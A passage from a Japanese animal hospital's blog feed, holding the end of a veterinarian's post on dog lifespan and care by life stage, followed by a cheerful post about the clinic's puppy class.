    • ミニチュア・ダックスフンド ・・・椎間板ヘルニア、歯根膿瘍
    • 柴犬 ・・・皮膚炎、緑内障
    • ポメラニアン ・・・気管虚脱、骨折(前肢)
    • キャバリア ・・・弁膜症などの心臓疾患
    • ミニチュア・シュナウザー ・・・高脂血症
    • フレンチ・ブルドッグ  ・・・軟口蓋過長症、脳腫瘍
    • ゴールデン・レトリーバー ・・・耳血腫、リンパ組織/造血組織の腫瘍

     

    愛犬が上記の犬種の中に該当するからといって、必ずその病気になる訳ではありません。しかし、犬種ごとの特徴を知ることは、病気の早期発見につながります。
     

    たけだ(さ)
    たけだ(さ)
    どの病気になりやすいかを知っていると、普段の生活で気を付けるポイントが見えてきますね。

     

    犬の長生きのギネス記録はどれくらい?


    世界で最も長く生きた犬は何歳なのでしょうか。
     

    ギネス記録によると1939年に29歳5か月という年齢で天寿を全うしたオーストラリアン・キャトル・ドッグのブルーイです。平均寿命の約2倍も生きたことになります!
     

    本牧通り動物病院の最高齢ワンちゃん

    ちなみに本牧通り動物病院での最高齢の記録は、ミニチュア・ダックスフンドのくろまめちゃん19歳2カ月齢です!(2021年8月現在)

     

    17歳の時に大病を患いましたが、必死の看病により復活。元気に19歳の誕生日を迎えることができました。
     

    犬のライフステージと心と身体の特徴


    愛犬に世界一長生きして欲しい!とまでは言わなくても、ストレスなく寿命を全うしてもらいたいですよね。
     

    そのためにはライフステージを知ることが大切です。歳を取るにつれて行動や身体はどのように変化するのでしょうか。
     

    犬のライフステージは子犬期、成犬期、シニア期に分けられます。
     

    たけだ(さ)
    たけだ(さ)
    年齢ごとの犬の行動や気持ち、身体の変化がわかると、接し方のポイントが見えてきます。

     

    犬の月齢とライフステージ

    犬の月齢・年齢行動・気持ちの特徴身体の特徴
    子犬期前半
    小・中型犬2~3か月
    大型犬〜5か月
    好奇心が旺盛で、新しい刺激を受け入れやすい時期です。多頭飼いをしたり、人や他の動物たちと暮らし始めたりするのに適しています。 乳歯が生えそろいます。
    骨も筋肉も発達する時期です。栄養バランスのよい食事をとりましょう。ワクチンをうって、体に免疫を付けます。
    子犬期後半
    小・中型犬4~12か月
    大型犬6〜12か月
    周囲の環境に対して恐怖心が芽生える時期です。また、家庭や犬同士のルールを覚え始めます。
    ドックランやトリミングデビューの時期でもありますが慎重に行いましょう。
    乳歯が永久歯に生え変わります。成犬の毛に変わります。1歳を迎えるころには、身体の成長が完了します。性成熟を迎える時期でもあります。
    成犬期前半
    小・中型犬1~4歳
    大型犬1〜3歳
    人間でいう思春期にあたり、家庭犬としては扱いが難しく、問題行動が起きやすい時期です。あたたかく根気強く接しましょう。
    この時期までに、去勢、避妊手術を行うとよいでしょう。
    歯磨き習慣や体重管理など規則正しい生活を心がけましょう。
    成犬期後半
    小・中型犬5~7歳
    大型犬 4〜5歳
    気持ちも行動も安定した時期です。トレーニングなどもやりやすい時ですので、色々なことを学習し、飼い主さんとの絆を深めていきましょう。運動量が多く、活発な時期です。散歩や遊びを通して十分にエネルギーを発散させ、健康維持や精神的な安定をはかることが大切です。
    シニア前半期
    小・中型犬8~12歳       
    大型犬6〜8歳
    認知機能や行動の変化がみられる時期です。不安傾向が強くなり、吠えやすくなったり、甘えるようになったりします。愛犬の行動を注意深く観察しましょう。運動量が減り、身体に変化が見られ始める時期です。食事内容の変更や定期的な健康診断をおすすめします。
    シニア期後半
    小・中型犬13歳~
    大型犬9歳〜
    行動変化が強く出てくる時期です。排泄の問題、昼夜逆転、徘徊、夜鳴きなどがみられることがあります。
    愛犬の生活の質を保つよう心がけましょう。
    筋力の低下がみられ、聴力、視力が衰えます。
    段差をなくしたり、滑らない床材にしたり、トイレや水飲みの場所を工夫したりしましょう。

     

    犬も人間と同様に、成長するにつれて心の変化も出てくることが分かりますね。お互いにストレスなく過ごすために、愛犬の気持ちを理解することは大切かもしれません。
     

    たけだ(さ)
    たけだ(さ)
    小さな事でも、もし愛犬の行動で気になることやお困りのことがあれば、お気軽にご相談くださいね。

     

    犬の年齢別のお世話の仕方


    犬のライフステージと成長の仕方がわかったところで、次は具体的なお世話の仕方を見ていきしょう。犬を飼っている方も愛犬との生活を見直すきっかけになるかもしれません。
     

    たけだ(さ)
    たけだ(さ)
    今の生活と比べてみてくださいね!

     

    年齢別の食事の与え方

    年齢と体重にあった食事を与えることが大切です。
     

    ドッグフードは大きく分けて「総合栄養食」と「療法食」の2種類があります。はじめは栄養バランスの良い「総合栄養食」を選びましょう。「療法食」は病気や健康維持のための食事です。栄養バランスに偏りがあるため、必ず獣医師と相談しながら与えるようにしましょう。
     

    1. 子犬期 (1歳未満)
      子犬用の高栄養なドッグフードを与えましょう。3ヶ月齢未満は乳歯が生えそろっておらず消化機能も未熟なので、ふやかしたフードを1日分の食事を3〜5回に分けて与えましょう。3ヶ月齢以降は徐々にドライフードへ切り替えます。食事回数も1歳で1日2〜3回になるように調節していきます。
    2. 成犬期 (小・中型犬 : 1〜7歳、大型犬 :1〜5歳)
      1歳になったら栄養バランスの良い成犬用のドッグフードに切り替えます。骨格や消化機能がしっかりしてくるとともに肥満になりやすい時期でもあります。食事やおやつを与えすぎないようにしましょう。誤食にも注意が必要です。
    3. シニア期 (小・中型犬 : 8歳以上、大型犬 :6歳以上)
      年齢とともに出てくる身体の変化に合わせて食事を選びましょう。例えば、関節のケアにはグルコサミンやコンドロイチンなどが含まれているもの、毛や皮膚のケアと認知症の予防にはオメガ3脂肪酸 (DHA、EPA)や抗酸化物質のビタミンEが含まれているものが良いとされています。食欲や消化機能が落ちている場合はウェットフードに切り替えるのも良いでしょう。

     

    年齢を問わず犬に絶対に与えてはいけない食品

    基本的には人間の食べているものを与えないようにしましょう。特に以下の食品は中毒を起こし、最悪の場合死に至ってしまうので注意が必要です。

  • チョコレート
  • コーヒー
  • ネギ類(長ネギ、タマネギ、ニンニクなど)
  • アルコール飲料
  • ぶどう、レーズン
  • キシリトール(少量なら問題ない。中毒量は0.03g/kgといわれている)
  • 年齢別の運動のさせ方

    肥満防止やストレス軽減のためにも運動は大切です。ストレスからくる問題行動 (物を破壊する、吠え続ける等)は少なくなることもあります。犬にとって主な運動方法は散歩になります。
     

    1. 子犬期〜シニア前半期 (小・中型犬 : 12歳以下、大型犬 :8歳以下)

      小型犬:1日1〜2回、1回20〜30分のお散歩が理想です。小型犬でもジャック・ラッセル・テリアなど体力のある犬種は30〜60分の散歩、またはドッグランなど思いっきり身体を動かせる環境が必要な場合もあります。

      中型犬:1日1〜2回、1回30〜60分のお散歩が理想です。ただ歩くだけでなく、ドッグランで走るのも良いと思います。

      大型犬:1日2回、1回約1時間のお散歩が理想です。体が重たく股関節などの負担になるため、走らせるより長い距離を歩く方が適しています。

    2. シニア後半期 (小・中型犬 : 13歳以上、大型犬 :9歳以上)
      犬のペースに合わせましょう。歩かずに外の空気を吸うだけでもかまいません。歩くことができる場合でも足腰に負担がないよう階段や坂道を避け、緩やかな散歩コースにしましょう。

     

    上記のように犬種や体格、年齢によって適切な運動量が異なります。運動量は多過ぎても少な過ぎても負担になってしまいます。
     

    たけだ(さ)
    たけだ(さ)
    犬種だけでなく個体差もあるので、愛犬のペースを見つつ個々に運動量を決めていきましょう。

     

    年齢別に変わる犬の健康診断の内容

    定期的に健康診断をすることは病気の早期発見、早期治療につながります。また、病院に慣れておくことで、病気になっていざ治療を行うとなった時のストレスが少なくなるメリットもあります。
     

    • 子犬期 (1歳未満)
      少なくとも1回は病院に来院することをおすすめします。先天的な病気や子犬がかかりやすい感染症もあるので、獣医師のチェックを受けることは大切です。特に疑わしい病気がない場合は、検便や身体検査など負担のかからない検査を行います。まずは「病院は怖くないんだ!」と思ってもらうという目的もあります。
    • 成犬期 (小・中型犬 : 1〜7歳、大型犬 :1〜5歳)
      1年に1回は受けることをおすすめします。内容は血液検査、身体検査、検便、検尿など負担の少ないものから始めると良いでしょう。
    • シニア期 (小・中型犬 : 8歳以上、大型犬 :6歳以上)
      1年に2回受けることをおすすめします。内容は血液検査、身体検査、検便、検尿、超音波検査、レントゲン検査で全身的にチェックしていくと良いでしょう。シニア期からは症状に出ていなくても健診で異常が見つかることはよくあります。

     

    ※本牧通り動物病院では子犬期時期のワンちゃんにおすすめの「パピー教室」を開催しています。
     

    パピー教室について詳しくはこちら

     

    また動物病院では、健康診断と同時に爪切りなどのケアや飼い方の相談なども出来ます。お近くの獣医さんに相談してみてください。また、毎年フィラリア症の検査・予防、狂犬病や混合ワクチン接種を行うことも大切です。
     

    避妊手術・去勢手術を行う時期

    犬を飼い始めて最初に悩むことかもしれません。悩むということは愛犬のことをしっかり考えている証拠。それぞれのメリットとデメリットを見ていきましょう。
     

    【避妊手術のメリット】

    • 子宮卵巣疾患(子宮蓄膿症、卵胞嚢腫など)にならなくなる
    • 乳腺腫瘍の発生率が下がる
    • 予定していない妊娠の回避
    • 発情期のストレスがなくなる
    • 寿命が伸びる可能性がある

    たけだ(さ)
    たけだ(さ)
    乳腺腫瘍の発生率は避妊手術のタイミングで変わります。

     

    乳腺腫瘍の発生率は、初回の発情を迎える前の避妊で0.05%、2回目の発情を迎える前の避妊で8%、2回目の発情以降は26%に抑えられるという有名な報告 (Robert Schneider et al., 1969)があります。そのため、避妊手術を考えている飼い主さんには2回目の発情を迎える前、つまり6か月齢〜1歳に行うことをおすすめしています。
     

    【去勢手術のメリット】

    • 精巣腫瘍にならなくなる
    • 会陰ヘルニア、肛門周囲腺腫、前立腺肥大などの発生率が下がる
    • マーキングや攻撃的な性格が軽減される可能性がある

     

    【避妊・去勢手術のデメリット】

    • 全身麻酔のリスク
    • 太りやすくなる
    • 縫合糸に反応してしこりができる(縫合糸反応性肉芽腫)
    • 雌でまれに尿道括約筋の緊張が弱まり尿漏れするようになる(ホルモン反応性尿失禁)
    • 子どもができなくなる

     

    いろいろな考え方があるので悩みますよね。けれど、病気になってから後悔して欲しくはありません。
     

    ネットにある情報がすべて正確とは限りません。不確かな情報に振り舞わされてしまう前に、専門家である獣医師に相談することをオススメします。
     

    たけだ(さ)
    たけだ(さ)
    愛犬にとってベストな生活を一緒に考えましょう。

     

    愛犬に長生きしてもらう3つのコツ


    愛犬と一秒でも長く一緒にいるために、飼い主ができることはあるのでしょうか。今からでもできる長生きのコツをご紹介します。
     

    • 肥満に気を付ける
    • 病気のサインを知る
    • 避妊手術を受ける

     

    肥満に気を付ける

    肥満の犬は糖尿病、関節疾患、心臓呼吸器疾患などの病気になるリスクが上がり、肥満でない犬と比べ寿命が短くなると言われています。
     

    最近うちの子太ってきているかもしれない…と心配になった飼い主さんもいるのではないでしょうか。肥満かどうかを家で確かめる方法があります。
     

    【肥満のどうかを調べるセルフチェック】
    ワンちゃんの体を触ったり見たりして調べてみてください。

  • 肋骨が触れない
  • 腰のくびれがない
  • お腹が地面に対して平行
  • 以上の1つでも当てはまるものがあれば、肥満かもしれません。
     

    犬が肥満になる一番の原因は人間が与える食事です。特におやつの量が多いことです。
     

    他には運動量が少ないことや、遺伝的要因、避妊・去勢手術の影響がありますが、良かれと思って与えていたおやつで寿命が縮んでしまったら悲しいですよね。愛犬の体型に不安を感じたら、お気軽に獣医師にご相談くださいね。
     

    たけだ(さ)
    たけだ(さ)
    その子にとってどのような解決方法がベストか一緒に考えましょう。

     

    病気のサインを知る

     病気の予防の為に病院で健康診断を受けることも大切ですが、病気のサインを知ることでお家でセルフチェックをすることもできます。若くて元気な時から様子を気にかけてあげることで、より変化に気が付きやすくなるでしょう。
     

    【病気のサイン】

  • 元気がない、食欲がない
  • 疲れやすい、息切れしやすい
  • 歩き方が変わった、足を引きずる
  • 身体を触ったときにキャンと大きな声でなく
  • 水を飲む量が増えた
  • うんちやおしっこの色や臭い・回数が変わった
  • 下痢や嘔吐が続いている
  • 咳をする
  • くしゃみ・鼻水・鼻づまり・鼻血が見られる
  • 口臭が強くなった、よだれが増えた
  • 体を痒がっている、皮膚が赤くなる、できものができている など
  •  

    少しでも気になることがあれば、獣医師にご相談くださいね。あなたの何気ない気遣いが愛犬を救うことになるかもしれません。
     

    避妊手術を受ける

    避妊手術を受けた犬は受けていない犬と比べて長生きしたとの報告 (Slivan R Urfer et al., 2019)(Michael S Kent et al., 2018)(Jessica M Hoffman et al., 2018)がいくつかあります。原因ははっきりしていませんが、性ホルモンの影響で免疫力が弱まり、感染症などになりやすいのでは?と推測されています。
     

    「犬の年齢別のお世話の仕方」に記載したように、避妊手術にもメリットとデメリットがあります。長生きするとは言っても手術をしたら子どもが産めなくなってしまうのか…手術なんてなんだか可哀想…と悩みますよね。どちらの選択にせよ家族全員が同じ意見を持っているということも大切です。
     

    まとめ


    どんなに愛犬のことを考えていても歳をとったり病気になったり、お別れの時が来てしまうのは仕方ないこと。大切なのは、納得がいくまで相談できる病院や獣医師がいるかどうかだと思います。
     

    当院の例をみても、病気や老化とうまく付き合いながら、幸せそうに暮らしているご家族が大勢いらっしゃいます。
     

    わたしたち「本牧通り動物病院」は、困った時にこそ頼りになる、動物たちと飼い主様の暮らしを支える病院であり続けるよう努力します。

    The post 【犬の寿命】獣医師が考える!犬の年齢の数え方と長生きの秘訣 first appeared on 動物の医学 | 本牧通り動物病院.

    ]]>
    https://honmokudori.com/blog/889/feed 0
    パピークラス https://honmokudori.com/blog/857 https://honmokudori.com/blog/857#respond Mon, 30 Aug 2021 02:12:28 +0000 https://honmokudori.com/blog/?p=857   前回は私が開催しているパピークラス、こねこ教室の概要をお届けしましたが、今回はパピークラスの実際の様子をお届けしたいと思います♫   当院のパピークラスの目的は、動物たちが「病院に行くのが楽し  ...続きを読む

    The post パピークラス first appeared on 動物の医学 | 本牧通り動物病院.

    ]]>
    たがい
    たがい

    みなさん、こんにちは!獣医師の互です(^^)/

     
    前回は私が開催しているパピークラス、こねこ教室の概要をお届けしましたが、今回はパピークラスの実際の様子をお届けしたいと思います♫
     

    当院のパピークラスの目的は、動物たちが「病院に行くのが楽しい!」と思ってくれること。通ってきてくださる子達はほぼ全員大喜びで病院、診察室に入ってきてくれます!
     

    もちろん私にも大喜びで会いに来てくれます。(笑)そんなかわいい子たちの熱烈な歓迎はこちらも大歓迎♡
     

    パピークラスをやっていてよかったなと思う瞬間でもあります°˖✧◝(⁰▿⁰)◜✧˖°
     

    では、今回はパピークラスの仲間と内容の一部を紹介したいと思います!
     

    まずは今回の主役! こたろうちゃん☆ポメラニアンの男の子です🐶


     

    こたろう
    こたろう
    ぼく、こたろう🐶 人もわんこも大好き!キャリーもへっちゃらだよ!

    いつもパピークラスの時間には喜んで病院に入ってきてくれます♪パピークラスの日以外は犬の幼稚園にも通っているというこたろうちゃん。飼い主さんから拝見した写真では他のワンちゃんともうまく遊べている様子が写っていました(^^)
     

    当院でも、以前は体格や性格などを考慮して複数のグループでクラスを開催していたのですが、コロナ感染のリスクを考慮して、現在は個別での対応をさせていただいています。他のワンちゃんやご家族への社会化不足が心配でしたが、そういった問題は全くなく、こたろうちゃんはパピークラスでもしっかりと勉強してくれて、順調に成長を見せてくれています!
     

    動物病院で開催するパピークラスのメリットは、メディカルな練習や獣医師のアドバイスがあること。こたろうちゃんは診察台で歯のチェックも練習中。しっかり口も触らせてくれます。こんな歯の状態が見られるのもパピークラスならでは!!皆さん、どちらが永久歯かわかりますか??
     


     

    パピークラスではメディカルなこと以外におすわりや伏せ、マテやアイコンタクトの練習、呼び戻しなど最低限必要なしつけや訓練も練習します。


     

    こたろう
    こたろう
    ぼく、伏せの勉強もしてるんだ。やった!出来るようになったよ!

    こんな感じで子犬の時期に起こりやすい問題行動へのアドバイスや対処法をお話しした後、メディカルチェックや覚えておきたい簡単な訓練などを楽しく実施しています(^^♪
     

    いかがでしたか?このブログを読んでいただいて少しでもパピークラスの楽しい様子が伝わるといいなぁと思います!
     

    新しいご家族を迎える予定がある方、ご興味のある方はぜひスタッフか、お電話でご相談くださいね♫
     

    最後に…コロナ禍にもかかわらず通っていただいている飼い主様には感謝いたします!
     


    トリミングで柴カットになったこたろうちゃん🐶
    わざわざ病院までお披露目に寄ってくださいました♡
     

    では、またブログでお会いしましょう~👋

    The post パピークラス first appeared on 動物の医学 | 本牧通り動物病院.

    ]]>
    https://honmokudori.com/blog/857/feed 0